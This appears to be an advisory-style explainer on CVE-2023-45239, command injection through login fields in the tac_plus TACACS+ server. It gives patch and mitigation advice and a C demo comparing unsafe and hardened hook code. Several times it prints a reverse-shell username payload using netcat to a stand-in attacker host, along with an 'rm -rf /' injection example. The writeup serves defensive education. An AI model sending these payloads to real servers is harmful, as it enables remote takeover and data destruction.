In October 2023, a critical vulnerability, CVE-2023-45239, was disclosed in tac_plus, a widely used open-source TACACS+ server for network device authentication, authorization, and accounting. The bug lets remote attackers gain shell access on servers running any version of tac_plus prior to commit 4fdf178, simply by injecting shell commands through crafted login fields. Here's what you need to know, explained simply.
What is tac_plus?
tac_plus is a daemon/server for the TACACS+ protocol, commonly used by network administrators to manage authentication, authorization, and accounting (AAA) for network devices, such as switches and routers.
---
Vulnerability Overview
The main issue? A lack of input validation. tac_plus lets administrators define pre-auth and post-auth commands (shell commands) that run whenever a user logs in. Until commit 4fdf178, tac_plus inserted raw protocol input, such as the username or the remote address, directly into those shell command strings without any sanitization.
So if an attacker controls the username, rem-addr, or NAC address field sent to tac_plus, they can append extra shell commands and execute arbitrary code as the user the tac_plus daemon runs as, which is often root. No valid credentials are needed: the fields are read from the login request before authentication succeeds.
Affected Versions
- All tac_plus versions prior to commit 4fdf178
How Does the Exploit Work?
The danger comes from how tac_plus builds the shell command line. Placeholders like $user or $address are substituted with the attacker-supplied values as plain text, and the resulting string is handed to a shell. Because the values are never sanitized, a shell metacharacter such as ; or | in the input ends the intended command and starts a new one.
Example vulnerable configuration
preauth_cmd = "/usr/local/bin/checklogin $user $address"
/* or */
postauth_cmd = "/usr/local/bin/log_login $user"
An attacker can send a username like
attacker; nc attacker.com 4444 -e /bin/sh;
That string is dropped verbatim into the command line. When the shell runs it, the first command receives the word "attacker" as its argument, and then nc connects back to the attacker's host and attaches /bin/sh to the connection, giving them remote code execution on the TACACS+ server.
Exploit Example
Let's step through a basic exploit scenario, assuming you control the username field in a TACACS+ login.
Attacker Sends Malicious Login:
- Username: attacker; nc attacker.com 4444 -e /bin/sh #
The shell then sees the following command line (the trailing # comments out whatever tac_plus appends after the username):
```sh
/usr/local/bin/log_login attacker; nc attacker.com 4444 -e /bin/sh #
```
Here's a simplified illustration of the pattern (not the actual tac_plus source, just the concept):
// UNSAFE: user-controlled input is pasted into a shell command string
char command[512];
snprintf(command, sizeof(command), "/usr/local/bin/check %s", username);
system(command); // dangerous: the shell interprets any metacharacters in username
If username is foo; rm -rf / #, this would run
/usr/local/bin/check foo; rm -rf / #
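To make the contrast concrete, here is an added example that puts the unsafe command-building pattern from above next to a hardened version. This is illustration code written for this writeup, not tac_plus source and not the change made in commit 4fdf178 (which the project describes as validation and escaping). The helper path /usr/local/bin/check_login, the allowed username character set, and the two sample usernames are all assumptions made for the demo.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Constructed sample inputs for the demo (not taken from a real login). */
static const char *BENIGN_USER  = "alice";
static const char *HOSTILE_USER = "attacker; nc attacker.com 4444 -e /bin/sh #";

/* UNSAFE: the pattern the writeup describes. The username is pasted into a
 * command line that will be given to a shell, so ';', '|', '`', '$(' and
 * friends inside it become shell syntax. Returns 0, or -1 if truncated. */
int build_unsafe_command(char *out, size_t outlen, const char *username)
{
    int n = snprintf(out, outlen, "/usr/local/bin/check_login %s", username);
    return (n < 0 || (size_t)n >= outlen) ? -1 : 0;
}

/* Allow-list validation (assumed policy for this demo): letters, digits and
 * a few punctuation characters, at most 64 bytes, no leading '-' so the
 * value can never be mistaken for an option by the helper program. */
int username_is_safe(const char *username)
{
    size_t len = strlen(username);
    if (len == 0 || len > 64 || username[0] == '-')
        return 0;
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)username[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-' || c == '@'))
            return 0;
    }
    return 1;
}

/* SAFE: no shell is involved at all. After validation, the helper is started
 * with fork()/execv() and receives the username and address as separate argv
 * entries, so shell metacharacters are just bytes in an argument. Returns the
 * helper's exit status, or -1 if validation fails or the process cannot run. */
int run_login_hook(const char *helper, const char *username, const char *address)
{
    if (!username_is_safe(username))
        return -1;

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)helper, (char *)username, (char *)address, NULL };
        execv(helper, argv);   /* only returns on failure */
        _exit(127);
    }

    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char cmd[512];

    build_unsafe_command(cmd, sizeof cmd, HOSTILE_USER);
    printf("unsafe command line a shell would run:\n  %s\n", cmd);

    printf("validator: \"%s\" -> %s\n", BENIGN_USER,
           username_is_safe(BENIGN_USER) ? "accepted" : "rejected");
    printf("validator: \"%s\" -> %s\n", HOSTILE_USER,
           username_is_safe(HOSTILE_USER) ? "accepted" : "rejected");

    /* /bin/true stands in for the site's own login hook. */
    printf("hook with hostile user: %d (rejected before exec)\n",
           run_login_hook("/bin/true", HOSTILE_USER, "10.0.0.1"));
    printf("hook with benign user: %d (exit status of /bin/true)\n",
           run_login_hook("/bin/true", BENIGN_USER, "10.0.0.1"));
    return 0;
}
```

The key design point is that validation alone is a second line of defence; the real fix is never letting a shell parse attacker-controlled bytes. Passing the values as argv entries removes the injection surface entirely, and the allow-list then only guards against abuse of the helper program itself (for example an argument that starts with a dash).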
Patch & Recommendation
The fix (commit 4fdf178) adds proper input validation and escaping so that user-controlled input can no longer inject commands.
Mitigation:
- Immediately upgrade tac_plus to a build that includes commit 4fdf178 or later.
- Disable pre-auth and post-auth commands unless they are absolutely needed.
- Until you can patch, restrict which hosts may reach the TACACS+ service (TCP port 49) to your managed network devices, since the injected fields are read before authentication completes.
References
- Commit 4fdf178 – tac_plus GitHub
- CVE-2023-45239 at NVD
- tac_plus Project Page
- OWASP Command Injection Cheat Sheet
Conclusion
CVE-2023-45239 is a textbook case of why user input must never be pasted into a shell command. If you run a tac_plus server, check whether your build includes commit 4fdf178 right now, and if it does not, patch or disable the auth hooks. Command injection bugs are a favourite target for attackers and can hand over full control of a server in seconds.
Stay safe. Deploy with care. And always validate your inputs.
Timeline
Published on: 10/06/2023 18:15:12 UTC
Last modified on: 11/07/2023 04:21:43 UTC